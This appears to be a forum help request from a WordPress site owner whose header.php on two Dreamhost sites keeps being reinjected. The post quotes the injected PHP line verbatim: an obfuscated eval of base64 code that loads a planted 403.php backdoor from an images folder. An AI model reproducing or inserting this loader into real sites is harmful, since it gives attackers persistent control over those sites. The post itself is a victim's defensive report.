I get the following code inserted into my header.php in 2 separate sites (both hosted on Dreamhost):
<?define('USE_DIRA', '/wp-includes/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>
Before, the directory was going to the images folder in the default theme, but I deleted the theme, deleted the code, and it appeared again, but now pointing to the images folder in wp-includes.
In those images folders, 2 files were uploaded: 403.php and links.db.
I changed all my passwords (db user, and dreamhost login). WordPress is up to date.
I've deleted the code twice, and it comes up again.
Any ideas on how they are getting in?